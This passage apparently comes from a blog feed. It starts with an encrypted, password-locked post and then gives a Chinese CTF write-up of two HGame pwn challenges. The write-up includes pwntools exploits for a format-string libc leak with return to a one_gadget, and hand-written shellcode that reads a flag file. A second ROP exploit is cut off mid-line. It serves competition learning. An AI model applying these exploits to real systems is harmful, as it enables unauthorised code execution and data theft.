0cb445d6c81a80283a9e3014c735c3e52186e346082f9ee5c3117d7d91c44a9a046c4f89f3a75d749a71f28aca37edec71c1e84e8d09420d8473cc825b80734448242d783bca79fe4222fd7683a3d7d2bc9e6e7d428cd676ebf5194aa274d1a9664ed5598ef2c5e09a22488b6aa32f0ec17c86bd70c46e848a005fa97a06dd8ab303b420fe37e4d09b6562febfbc2b980e8d36ba7bd699d4e6d6fa2c7636e5d8a980c194e88351133e16ef83022f6c4b5c60a0870d4dfa112303767b3578e3e30eeb9a68e63cf52f4b75c0857be396eeffc29a4bea099e795dc0374f5d7e9fadbbdb023614ce41536ce1be7d3256e2ea6e5f3d70e6a45f748b1c5fa715f5d996074d43683dc437882c36ecfd43d9e1ad3fba9ebd272c62bfd3b9ba30ba272dfb60fda127f6aa5f3c232c03bba981fe00ff93cb9268a81fd49c7aef0e06be9ae5124ce1e2f9dc8e4ea72adeca25aec551ed2fc279ee71b761b6594e38460a75314e7f20c5a3c33cec3e473f6358c66c8b5086c917a68914b3558fd3d10bde8573f01c15a7428a0245c750a26bdd067448142baaafd5cca6dff680889676505ca0e06ac7e46deb6f129ef121c6874743b44ebbd8618573d850364f9f97db5f44c30c5d9c57d331678790be94acf445528ee772b3d3c35695c6e55a0a2b2e7bd100ccd5876b2f880fac9901480e4ed37b655266e3d9ab1199fb4e5be81ce7820e95392047544ecce05d6d05da42dc0e3fc2da2781051b0535d310c759a199f32ae14e8888eeea72a73a4cc96eae8fd99a674862cf0bf5c70708c8d65f68549d8dc0b2b7953d23c50c25c63a44d8fe8500994249d7094e8f2e9ff7b89a753920c4410c56b8342f422ec00d0a438174af8e24572a93b4bd740cc9d41a091f40bfb8c4a55f7a97be3604aa836e152c63cbadbc628319fb7a0a941e824f31223a987302b6f7b9e0221bd2688d8faf5c3ab3e484c55d3c8820ea91203e5339045346c03218c7c95b83a573119eb359c86fbc20565be8c0b6e787253495c97de49262e5d73a3c0c0afa62d32a79c01ea119e52f6906a035cd8e32d75bb2dab10ca6c1fe7623780b6dc522302d828a6cbdc2f94f46fa7ba7f287ff9e156232817349e3d61a4834c67c418f478d7935f5e778550314ec72c5c4bff997338529f94cab3bc5ad478dd65fef768c1fe651b6bfe9d17317e8715d24792cc1e36322f9d91df022c93133d8382f581dadc28e8ec41bdc0fea51f9bc3b2d4df43c5b05f127f20b14433e9760d90c50c4203ab4a0343750bba1b92ceb1f1f4c555725f2415531a22e4a1ceb8a182e29f84eb4018cb0c2a904e8912d3eb8f84215ad9def4ac8c93d50b89c005e599b7817c2178b4fb90f0f798151bf74d6ca159ebb727edcb642f73243f663cb1c31fda58822c17d03b0c001ad022016ff05dad3a9fb4976c60543353a953c9b890c666c7f891e7abd0ef2ef8affdafa0138276ec4a5fd030544b038ae5c9d91913c81120359e1aae6e5feb8704bd8dac710e69e4ee0e98b0a887ac3829b98c04124ef1990273283234b4092f50957a8b56d16c0054fa87b426da137bfa7a3f984748a1ce069cea1ee0fa2b86ba4202c6e16bf8285991c340be4de389fb4b73a7adb181e7fbd5fbce68f2e642c7fcb882309fdb4cf05b107ba3bd41affdf480605d679614b1a8edabeafbc85cd44cfbc4bcdf0bae34ce1cf299af4d99c42ed49f1669432dfd3e4be2e4fecb6d9e408e5b636c85cb481c2408ce50d3968fa56b98606323c1e66c16fc35be1208e98cdd65524efaabadefad88443fa6cfc137d3c3ad707811a44ce373d04626b46244605949fc05f7a9612c27c31b2ead9fee323713fe52840d390fdcb5091b7fb9fa803df5e42e3cf569b6f98f16cdcca4a21cdc40b0ec519fc629fbb090fd50f18384beb30b00eda11e3f8b8a4ec92213539be04ed23753ad3280bb2fe7d9a4ea7b743c56b37ae743d74dcc6db0cc9a68c88893b6ac5cd53daec42ec230b32f3fe34cbc3e72a2c9c348fb95db71d60c9faaf206c3034586f3e22f9c741885a96a96788b1c93b41439f84437d14205d16ec304d8ccc197342f8499707bf4ce8ae04da974e8e14242a94a0ece3a3c5435a5a9071d27e22affb94222bc63e9669d5f8d7681bf10ffb307f4e682c1dd737d0202263435f910ffd21d843fd91de7b2374983f55db2c4bdd6c7d2899afb291411e889bf09c32986af688280e30bf17dca8d0ad4b04ca81e57ce9621787871e304241d951826809df7f489e53f5905e37dcc6fa7b0558d46b3e15ed66da07a3bf9fda86438fcfff2a0924d98450a5d046c015b7680168893cc05660e60cfc97c8855eb1e99dead3bf63d4bbe247668a4b943bfa80c692d50b7170d330d80476af56fcb7d98c1de12eaba601abc2e6403509ca3ae67923812af0842fb7b2cd943e74acb7836e5793e65f09afd2d4e651829150c7097fdcb4647cb7870f09631b2bcefe7b92491016fa9558bf6e779fec0eef7e85e8bf0d8c9e99fcc28b65bd1bec4bcd114c519f4c8074a2670ff2a3549bfa2227baff24fa8b5e11df09ab4e3294a806fd1d958c33ca29e2a21392435a747d397896ae739d269405e65759d7828524e9334be1af1d0b71ffaf32c16b15090636c233543863c0d0dff6bbcc4b71da25704012a82bcad4091e1687d117cf4b58c6aa80eb1942eb963f3d392351303c784c16071e24cffc5dea38241b9cc929ed819da35ae9ba873249e6912fa9b721d4e7ab971be14dcae4a8e0bf3631df87c7a21e974b98a8665727c8804f68a36a6ba4bfef9119839b05f7bb1bfc93afcbd5bf9b3908d5f782dc6b4526bd57eb50adea1e6c987afe086a5df605b49bd0e07e77bba7eb121f95acddd3b7e7d52f314138297f17254833c5c950a0fb533ba996b9b63a26e02f6701398593149d5994d4db095cdd4706419d94fefd0aa6d07e6bb6a2c19fc911f803603608312b5aa9236c388a3ac82caf3d9c81b3ddb810ded0503789bdf5841aa00ad733de5b45de3be3e7450bce1c6a43ffb93e05af20c57c70b8350ad25146f7cbcbb9c8a7f0060929d859400ee71f535b35a57386241e4e34611ff1a61d727092c1172defd1b4ce75e51cf5c88d7f6583c7f2add1f4264f92af8879ab396b2f72363274f468bb2846837e1180ffba8d8ad88f5d1c5508bbeea6ca1c6c362d3438b824266d0708acfa4031840473a2e5c68022d04e376fd8a01949b51156c281ffbcc7ea51dd9f6bffbc46ee79d7ae4ee6cb85979eb5f489f4adbef67bcbd60614676a280a40f47fb6109c75cf7740a4e3277d598d9026790040be346b96917e6e67d07ad684f9aca94911c579af63595be2b45eca7284a93b583007f24ebd2d0fb63e3b573cd8dce0ddee8a876b98aef2edb172efe5d1d5c91c2508616b9e9f5ee2d196301308251351c4082c6f2bd3df52080a7d246a02f0c0a4fd087937848926ad53d4cf800436d0da50374339402e401105408a85bf9d49fbce2a4096c7f786bbbbfc71e72d1383e55c5958ca35fed75c657f73e0831c02edf7ab44383d1ec415db8f3d78a15fd65309d8b5b5e91396f7dde4818d04c1f6ce44b8d083977989b1773b6c41f4ae2d24b5a2b1e45a8bddf750e701db577977cf77d761238db21b658a0e05e1133dd9b00512784b0602f6ba8eae5e1a7f527d82e96e0ddf1f46714464e67ecc34c2cf15910f204338de6a93adaaa23516efea2a8b3863b2f10ab63879f1006fb6d2ffae5ae4e9522e6428301ad236edfa7e1c94745a59d68ee686088dc134ab587f945ebab48988bf272166871909eb8936baa28b7c39400275e7519e6d6e7053dd6bccaac2bec002369fe8cbb280336a4a580e2f15e09b4696cec313a5e2a8717a7c4d776b3880381baee1244334ccae1a8ec7b78f9893fe81115f7faa975cd7abc7214b30ca1a29c8d2030c662218c038ed7197b135a511c205f661ed8b01a4dc0ae35b52f8e4c8f0956c58a32c260679e141b3d2d6579545808da23e203c0330784b3e28bd6450a604577388a04cee374b8ac050bb3704174abf77ab3ba18cf5e311f3f06083706991bfee52c4cea48e72d8cc8916d32fd6b87d52a58151ce50e73eff114707648c089d37ef6563586e7011f5baf2d54386f5d989b38e3bf6afefeae9ace667477811e1d60be230747f0c7adb82a37b596980cdc96e631665ddb29b556219e4dac192cb1b537a98d1aee5c81c35e51395813ccc4fa9145ed25c08532bfcb92a2d0621bf4254af8e316baa0e8dfbb3f9075363868c6ea1fd191ce7e5d6d98ff71950bcd51c64483317bd67859e5f4a72fcf99618f693d51062e9d71c6c8e76d930600566e6535c1fcf76c39ab67530e5bcb1cf19c05bbddf432bab374febe73d1116e63aed27efbe5634d44945657b9548548dbf993717652258b7191ebb42d0b100a8fc93a34abd13e6d1fb5ff831eb665639948518024eb84e7823fed060da1eae1a55032daf224fa1db778bedde8c5a95892e1b2a3c71406f59cd33b1576a0aa754ae0153b3b44c8286510b23d5c2fd171dfa2be666544d125246219f3ed32f1e2497622543ce62b1296764724bfbb6c0f649bfa8613cae1f729b7df68bb72d7cbacc917ec453586652f6a8419de7755232527c9ce195d80813f70a051d0ef3f1e340a22fa12add8e7af151e1311a6c6fb2e32f8022990a0a3da12a78de08ed13b74da839d991c628fb79b2468c98e5382f106fef3036d269ee930383e01dd1bd5b4347b8b20aafd819170a298d90a2bf3d600573474c61a912b1209bf671ff19851d134f9a4325648b76c9811f73dec2a04de994acc0d70499da65175c5d4bbaab43773041b6a027c16ac7a5fa6d5886c45ccf14a3efeffdfc308a5c3185f43be66f74915b8fc2efbb6cf547a799e5cf6e8ea7abf56715e20fdb4dcc52649521a7afcfbd35ed3ba63c8b1cccb9479832d16576988d2677dad4e0cd7a6fd5f7417fa79aea860c741c595aa005a384cecd23237e4b0b6166e982681c0b42eecea30c05a93a41499499aee7005c6643a8980e3cd7a6ecc51183be1029ad621689258fe7a1f4e1be72af92660ad6e1a9b3af33a72fe43058b7040a25b89b87396d931a1f5cdef424de45c0403cfa499c4c3e886ff5c08c3a6025545a14d8324a4042214c76a726cf5bb686415f3c0a8623e4d799aa30c2f9d1e1a682e94712bb3d2df515c5b3d542df4caa259ee9381d675a7bc397cf3efc945af5f33900c1254bc06fb9a78713ea0a00d0f9182666a448e56319570d53809130c8f8b03374639253a87db1f314ac494d29ba1d6534e542c404e5b72abee0079f8b6f16094ef0a72dbba71f0a9a266884266b179256a5ce7980f3f0f12fb91094cdc3cc05b8418291b281c5349f903fc1712c8ea60232d09ad2e40815ce91a3a18e54807fd42d855f9614b703c71ec3a448c0e80e4e350e714eace658c28b28398fe5f4a34d259cceda6abce0379b5ed6354e0bbd64a546ae1239ab9245ad9d4ef8398e77ee0be41171f8f931fc1a5a584840cc5775d3307c490cfe1bdf1082d1123311320386adb3ca4f2c6f7ad831ea416fe1c83850313ca6f14cd7f89d520738666ff6226b8f6625ceace67479b3cb8ba51bc1eea049c7b22dfe6f21bcadfc458eda082d0c35e3af99ca6183a28220e7286dfc6e9eacc430e4ae3dd6e0c366b5cd9123a0a3668f82dd49c8bb2cf17e584da3a9cb037726d8f741e6f1f4a4a7db0254bedd1a5f8b08226bd1e25f0be482090456fce812aa841adc388cec1315d503adc66edfedc5c04002d1fdbce2a538a8e30701e43d2a19917690b70d97ed93f5bde88987759bf254268a7545314f4383ec49e48f966c5244a848241562e30b32bbfd9329f5cac82f2a02dd22ba81c1ef3a64e837ecf7d1dd1083d0ebfc1619c7a3cec565e80dcb03e714a41ad646dc22796e4309ee597bcfc023d362076666eefbf1567edbfd19b548f56e63a9c15faa95cbf0da9b97ac06cca90bb31f11ed05e0eaa1016aceed898c90db6f13127dc62c82c5490b62a69c09fd0c156e770c89b1e4d5e1b231cabc819971bf614366805d70c95f5faf88826e853bdda8c816c778cc1712af5a8ebabbd5ab2c78cb6b3e668e6817700162d382ffe7a8025830c2fd0a4f67d95d2a4c09fbe5c25a4fbec2b371ec5e5db131d4a1e8b81e462903e07b179945b8a7c02f0eb60a19cd288e5016c0a5fc02c64b02484b68075a4d39531752172965f09ac63e0efd5d69f09073fa2c9cedb22f3a79ba30bc5d19e147eddac058870a06ba8d90dfeda61cd2b4a6d0042c3edba8ef7761630d10d5d8d034f02f07b5c9f9f5727129f66b994ffc463cc231d3a6851e2015ce5ed159a4b90c49c88819490266374e31b2882d387003dc6f43dd5659aeb956198767d62b37e90daf86d0470acf9903a7cc034cc3fdfbc8c6dca65f5e42b07e28fa6fef9a8adb8ef4844a1ea0a9d2dac44066ae8ba141d81eca4d760778f7cd0807c746fb2f43d5c8b177ed9a9599d509b88184a75623b5fed552b14551b672c7008646f406829c5ec05ac3b31173fec351a86200dd8b25c380f55bb7316d22f6ab169b4432a25e04ae6c6343effb3d5b6fc9c023bab8e50314a06fbc5801c5a4961c5fad5d7eb1631bc00c01c08514e63ff4c96a56594409d6cd5a4bed7049b5741337be35e17ef469d63283aaeb8881e99632bf889981a809b0fc2bfd49c4b4eda10a1826b0f6bb3beabe3315cf412c7218262c2acf679003df748fab192d4ce23d70025fef9f418511ce168a8afd7eb6c3bb3f7cb41a8b93acd10ac22ffb19ad6f1c5b32d9415b3c6db6aedd5ce0c7719d1582133f1ddefa37f13d831d1f0b3cf3c6ce4b0f89aa142ee1ffe170bb5203268ab60e543a36c692587924be1eeb97bdb476f4c3e3bb5f9f1a50feacde550d8f28830d03818680d23ed8edee1b20f861c705f10f767cc57c7464240790ddf7607b926eadab8ebb7e821e4df0ffc12fce369206d78a3a61b7146bf1f2f81845c6615649dae4a81eb190d5dcdbcda1e8fc6d5c9a51e7eeed866df6fd07e4e1fc49527c1aa8dd31294abb0de4170caeb05b3e6b2149d192b24f0c23bebbe68e9418b3ee1c042108306aecd0a1fdba8e6734cd723acf6aa35b1bdf734e6fc53f4db2fe772d5e3280504783ec2656b646cf588cbd2f1240dea65acb46772c2025c6595218e12054283d317cf36562bcecbe51fcd5840c5980e62ec3975e89a1097af7b1940a83b54fa2b43904eb2d33f548fe4cab9faabf1cbff697ce6a5195e6128e3eb7d661e7e584246b427ef33607bbfe312deffe2b10b6e96e603f8ce54d0f329b8a69e3dd8965189aab4a38f3cf9d986d3633b983787313c1b95b5ded2c8ec4402e8b1bb476d587b4d52def6716ff43efdd8ba14071163a0a9b9bf99af161fcd5c46e5b382501a3b07a9e407c1bfc53947f07455d0e92aeb89cc1c3becb3ed0905fa718eda282ae3140e2ae708337bde934b812cd0208b42435c9b24eb2e65c714d4c4a2dfd7b65bf46839e8120021493a886fb05068e6761fb49844921e77071d187f0691204c3808302122f71048db34462e7364408b8a0fa1cfb4af8a345f031b2cbadd3566eaec08d531d4368076b9ad70c06896c89818a520fdf82320f91870fd3b0de0875906c6d5e30aee7d786ee63e4444759e9d25a3fabae7638b7acd91e0352a4d3045d2d43674d6d3b9873e954f9cb94af485979839c6a6411d6613a263d69f6a4cec4b0f670581028882b7d092b64141a0f36f1ebb86765358534bb34f6520f3c65d53e42656852565370868b1ca954f9f766efdc430713ec2d17e7dc813729299baf5c81dd059cadf0b92999cabc4aa52076e83c1926ce69dfb1357405fcd935302b220e364a5b6126c582ba65eca917f218d079731b3705bb384fcde53b178af9777a1cf70b32ed8206babcdc72b7c827e0fdba3ed1f6fcfda40ef3271a05370d10f3f02751bad2219ef802f56c522852408e752b2373c56a3acdd0cad1151593ea7aa95e9673b0b46662e538643127d35d44b97f0e2529f5a8f4340be37dcb0b4ff8c6d573ad0f122e35890bc8da49348ebda9713077ce27677407987a52295fb2297cb054448bb9af8683201f1e6fc9947324503e17d0d1186346d57c546f9c60e420f5d39e83df287383045a0e7916be21e2895e6519c14dee066f8dd44e6f78541a65ef44797a9656f617cb1a12009bd5021040cb15bb60f1a651c8393e876b16e5f429b197c21d00aa9e6d6139107323c7ab188e0d961750121c258eb772cb3160dfe2b473b5055fa8982b3ced83716b2ae72c1272a7c0bfd249a3d74a05af0933afcea18a73a8483f5dd8d56357f3807d5ba253ea35c2ca5530f4622dc91b280e4f98bac89782b149e51466babce81af241fb98a9b8370b3818572ced60c385388c0e9bf1ce81ea0de87e14bb98229ba43fae3273ccc42e22c0bee38e712eea001707e26aa85928d28dcf2a17d4bb1743cf46fb35a81500c23debdf05efc7e17fb22d88deb92d051b954efca8b1b57488eb1f2f7eceda8b11761e4b5ec92359d3d16c807564aaa87b4b1437785630ed33011d11a21c0e287f702d0e3d1c67a3506a089af6ceb4773546f040ccc997a6a7b54b07d8feb388e1cd66f32b0eab4488974d686cc35832c04b4e306388f0b7c4fd9f8e8d22ab7267a861b06d6b01f880542334b3b9074fa29fc83223e07b383310247365b88b4b6510b54e620e559263cd9f8aaa24adabf9559893a0e8e6a98d484837549d03f2200fafb439ab6e4956f9a2cad7a385c6a4db85b022e14c0f0a015f06f09b27ce9fc7c88b83908d55f7fed29c32fefe04f7b68217359fe5b9db7949ac9103d1f69b51f07b8d03c89a8b0653271ce46b8edc7bdd648276ee45f6fa0d6ed24a95804d0b3a19bd580e611f7d0e3d810c19ebc36371788fd36af928159b6e7f3c7f21277ae01436784fa374a3eff2d57bcea74929c85aa3501f04c441621620ca5d67c691be961982f5d70b7c6d92d718c3a291f9985ca6292899e9c7b428c3047744e073fbb48d82aef38aea117e05471e71a5f964929541b456b9bdc19affb533ea59032ae36947945982eaf6110d035641fcd0f2c4941952ede4cd79ff188963b807a8941505ac3a8fcaa2ce8af5fd6f0fce59759632dc806191fb6c3c112cfbde561c4796338fc3e781a4273011cd57319168b4a6a7e031aab3373253d073a40c904dfb57eaed50bc1e7d9c940abdcd5e6c5c3d670115622b93a021ec7dae379651d889d64f2be99c81be82520c770b83398009969b28d5378eaf0c3e7ddb25e11683f00fc7056ff70c6ca54cc468f7447248fe3cc1e04a052ec4a54135ebbf592b3745433b06fd72b9890b6344d0fdad042ce24c23c9aead0e7333dbed4093bcb1ab1fb10ec7c0871d3419e780b7900a25df38f488d326c9f4ad4017a4fbf215bda986ad3c18d48b639a57a4a1b594102395c38c570ecb30245dae9733d3816325804e6b58def5dc8e2ead5bcaa6d09dc708e6b7009940533e9ff92a3b6ae15c07ed761e477b2cc6057addd04302b9678495249758baf85336f2950218fd952c71b166687457dd45ce323619d0425fb5fd1542eab5e6e623928a34a925c502c4e89ad9a9129f4acf4eb7491d6e184d1c30abc4a0465834b7f831dab537d0e86303f99cb4ca48aedb2ca7bd55f9f2d7e2b312a4c518446d823f855878c8e3834cfaa132be6ae51b38c00f9c7b5f56dd1dc9393ac78d4e5e201cd5664ebded2010320e751b579a2e73ba7b1eb1835f8d00d558931b01abaec70e870b3f52e70c10028529f4eda42b2c3a0fcf9e1853e1e02e156af6a53ce2e1238fd380021bceb1481e113ba198e0c97cb1fef1b3c5b4fbf1c6b62e7f9b648d7200038785600e2b6d5dc3e11a1caa613949e6542c469305b5a7cd577229873fa3d3030f6949b53519cea1c95ce23273af47fe546664ee79c97b804dc7151d3824ab3f3162cb96a3d98a61ea6ca0fb99b508d156d4d4d8951e441cad890f3db35fb3791720161e7d7bbe1c778358f5d7767af6502d29a5be971dabb874ecd7dd2372b7e1e5a765a14bc7de15a2122d949ab61b5b08c8c21783016e29361ff42a32af761196a01f472e64d87e0749a963a0e7a30e8260fd01396265d3f87923df74f8d81aaecec9779c0cf6797c46fbc9144f1ee147d392957e1574c8115596fb0bee3af02db6e019156d8d8436a95bef6ef07010b990c6938922be02e04c7b5450faf954ecdc134b6a2bdfa1425f4e11992f545f2b3ab8b9ace10892cabc4b0cefc1375d94afcd761be6574063caeee4922ecdefeb5b492fd3b6f98512364b430f724e25b1d7293b23b51a12fd8d6e38b03f8390393f367b3d8e51bb29743a4e8568cd9135f27cfc0c9024daf96b7c16260a62c11434c98900c61ce4931472ec387aef90ca024e0a84b351c6046944749315e737430736f96f6df70cce909587ea1f563bc26e19c5c191c2b5d59e2c9803b86d5d72c77a7522590953d49bf1c0dc52f947c04b3793fcd596298ead19d4b36889b9ffccececac60488d0c85beb56aa36379033bc2da50fcc7f37d5fbb83b5f26070efe2dc57aec714cd5a2686481ffaca454a70f3cad96b01ccc1d1adcf54591aead0dcd09f13c64ebc3305e5cf449696924fc297e812dbe8f7b16324c5fd3a385f01c17e3544255750ff523d01b81fa7db63cdf96527288a2548823145da362a91a359e0c641d5650cd3e341352f4c9049f0caa5e3f805a7d96b8bf76d577a88fb59f31025c2c0628b0aab92d0f95f0ed27a798cc4014a7e2bb5baf788eeae1cd6b7ae2ff1e1fe720ac71af8f6384e12f97306aecf953d94aa1a8fea2af9ed681174738aab7d793a84be4af5c18d3b6964747986d96cac0adb2b01a6cfa6fe8131488c110906a70fd997fbffdf22cb1a26c68e3096b688cc70b4d74415e70820e6c962affea2f28cd17ee6d3047e68e4b3a8dc59f78b21ca6d4eef9f1081126f87198f48d5bb8c1df49ebac87d88091bf65a06ae25255527b21626ff4318c93768b5221a7d9b7855c3a8ad032007070292fa362edea5f750ab9308f4cc52e836a3f9ed07</script>
<div class="hbe hbe-content">
<div class="hbe hbe-input hbe-input-default">
<input class="hbe hbe-input-field hbe-input-field-default" type="password" id="hbePass">
<label class="hbe hbe-input-label hbe-input-label-default" for="hbePass">
<span class="hbe hbe-input-label-content hbe-input-label-content-default">Hey, password is required here.</span>
</label>
</div>
</div>
</div>
<script data-pjax src="/lib/hbe.js"></script><link href="/css/hbe.style.css" rel="stylesheet" type="text/css">]]></content>
<categories>
<category>笔记</category>
</categories>
</entry>
<entry>
<title>HGame</title>
<url>/article/HGame/</url>
<content><![CDATA[<h1 id="week1"><a href="#week1" class="headerlink" title="week1"></a>week1</h1><span id="more"></span>
<h2 id="once-格式化字符串"><a href="#once-格式化字符串" class="headerlink" title="once(格式化字符串)"></a>once(格式化字符串)</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210306191440.png" alt="20210306191440"></p>
<p>IDA看,明显是格式化字符串漏洞,显然是⽤来 leak (泄露地址) 的了,泄露出 libc 的地址,就能计算出 onegadget 的地址了,最后覆盖返回地址,使得返回到 onegadget 就能拿到 shell</p>
<p>但是这不能⼀次就完成,要分两步,第⼀次利⽤要先 leak,覆盖返回地址,返回到漏洞开始的地⽅(这里就是程序的 vuln 函数),第⼆次就覆盖返回地址成 onegadget 即可</p>
<p>在第⼀步呢,有⼀个关键点,地址随机化的最低 12 bit,是不会变的,所以只要覆盖最低的 1 个字节,就可以返回到其它相近的地⽅,⽐如 vuln 函数的开头,</p>
<p>我用[tag]的方法找字符串的偏移老找不准:</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210306191649.png" alt="20210306191649"></p>
<p>如果想要找到栈中一些函数的地址来计算偏移的时候,不知道break在printf处后,栈中第一个值到底是第几个参数,所以我用了IDA去找。</p>
<p>test_exp:</p>
<figure class="highlight py"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>, <span class="string">'-x'</span>, <span class="string">'zsh'</span>, <span class="string">'-c'</span>]</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'AAAA'</span> + <span class="string">'%1$p'</span> +<span class="string">'%2$p'</span> + <span class="string">'%3$p'</span> +<span class="string">'%4$p'</span> + <span class="string">'%5$p'</span> + <span class="string">'%6$p'</span> + <span class="string">'%13$p'</span> + <span class="string">'%14$p'</span></span><br><span class="line"></span><br><span class="line">p.sendafter(<span class="string">'It is your turn: '</span>,payload)</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307140046.png" alt="20210307140046"></p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307140246.png" alt="20210307140246"></p>
<p>可以看到第13个参数是一个 libc_start_main 的地址,利用这个地址与题目给的 libc 文件就可以计算出 onegadget </p>
<p>最后的 getshell 中 +0x4f3d5 用 one_gadget [libcname] 指令</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210308133927.png" alt="20210308133927"></p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.terminal = [<span class="string">'gnome-terminal'</span>, <span class="string">'-x'</span>, <span class="string">'zsh'</span>, <span class="string">'-c'</span>]</span><br><span class="line">context.log_level = <span class="string">'info'</span></span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'182.92.108.71'</span>,<span class="number">30107</span>)</span><br><span class="line"><span class="comment">#p = process('./once')</span></span><br><span class="line"><span class="comment">#p = remote('127.0.0.1',12345)</span></span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">'./libc-2.27.so'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line">binary = ELF(<span class="string">'./once'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line">payload = <span class="string">'%13$p\n'</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x28</span>,<span class="string">'a'</span>)</span><br><span class="line">payload += <span class="string">'\xD3'</span> </span><br><span class="line">p.sendafter(<span class="string">'It is your turn: '</span>,payload)</span><br><span class="line"></span><br><span class="line">libc_addr = p.recvuntil(<span class="string">'\n'</span>,<span class="string">'True'</span>)</span><br><span class="line">libc_addr = <span class="built_in">int</span>(libc_addr,<span class="number">16</span>)</span><br><span class="line">libc_base = libc_addr - libc.symbols[<span class="string">'__libc_start_main'</span>] - <span class="number">0xe7</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">'libc_base'</span>,<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">getshell = <span class="string">'a'</span> *<span class="number">0x28</span></span><br><span class="line">getshell += p64(libc_base + <span class="number">0x4f3d5</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'It is your turn: '</span>)</span><br><span class="line">p.sendline(getshell)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="letter(没搞懂"><a href="#letter(没搞懂" class="headerlink" title="letter(没搞懂"></a>letter(没搞懂</h2><p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307191837.png" alt="20210307191837"></p>
<p>程序禁用了一些系统调用,导致无法直接用 shellcode 直接getshell ,即 asm(shellcraft.sh()),所以得手写汇编 shellcode;因为程序是64位的,所以要写 context.arch = ‘amd64’</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210307194929.png" alt="20210307194929"></p>
<p>负数溢出,但是没搞明白的是为什么是 -268376833 。。。。当事人非常郁闷</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"><span class="comment">#r = process('./letter')</span></span><br><span class="line">r=remote(<span class="string">'182.92.108.71'</span>,<span class="number">31305</span>)</span><br><span class="line">r.sendlineafter(<span class="string">'?'</span>,<span class="string">'-268376833'</span>)</span><br><span class="line"><span class="comment">#r.sendline('a'*0x18+p64(0x60105c)+asm(shellcraft.sh()))</span></span><br><span class="line">shellcode = <span class="string">'''</span></span><br><span class="line"><span class="string">mov rax, 0x101010101010101</span></span><br><span class="line"><span class="string">push rax</span></span><br><span class="line"><span class="string">mov rax, 0x101010101010101 ^ 0x67616c66</span></span><br><span class="line"><span class="string">xor [rsp], rax</span></span><br><span class="line"><span class="string">mov rdi, rsp</span></span><br><span class="line"><span class="string">xor rsi, rsi</span></span><br><span class="line"><span class="string">xor rdx, rdx</span></span><br><span class="line"><span class="string">mov rax, 2</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">xor rax, rax</span></span><br><span class="line"><span class="string">mov rdi, 3</span></span><br><span class="line"><span class="string">mov rsi, 0x601070</span></span><br><span class="line"><span class="string">mov rdx, 0x100</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">mov rax, 1</span></span><br><span class="line"><span class="string">mov rdi, 1</span></span><br><span class="line"><span class="string">mov rsi, 0x601070</span></span><br><span class="line"><span class="string">mov rdx,0x100</span></span><br><span class="line"><span class="string">syscall</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">r.sendline(<span class="string">'a'</span>*<span class="number">0x18</span>+p64(<span class="number">0x60108C</span>)+asm(shellcode))</span><br><span class="line">r.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>发现其他师傅有另外的解法</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./letter'</span>)</span><br><span class="line">context.arch = elf.arch</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pr</span>(<span class="params">a,addr</span>):</span></span><br><span class="line"> log.success(a+<span class="string">'====>'</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line">write_plt = elf.plt[<span class="string">'write'</span>]</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">read_got = elf.got[<span class="string">'read'</span>]</span><br><span class="line">prdi = <span class="number">0x400AA3</span></span><br><span class="line">p6 = <span class="number">0x400A9A</span></span><br><span class="line">mmmc = <span class="number">0x400A80</span></span><br><span class="line">vuln = <span class="number">0x400958</span></span><br><span class="line">p = remote(<span class="string">'182.92.108.71'</span>,<span class="number">31305</span>)</span><br><span class="line"><span class="comment">#p = process('./letter')</span></span><br><span class="line"><span class="comment">#gdb.attach(p,'b *0x4009BB')</span></span><br><span class="line">p.sendafter(<span class="string">'?\n'</span>,<span class="built_in">str</span>(<span class="number">0xffffffff</span>).ljust(<span class="number">0x10</span>,<span class="string">'\x00'</span>))</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span>+p64(p6)+p64(<span class="number">0</span>)+p64(<span class="number">1</span>)+p64(write_got)+p64(<span class="number">1</span>)+p64(write_got)+p64(<span class="number">8</span>)</span><br><span class="line">payload += p64(mmmc)+<span class="string">'a'</span>*<span 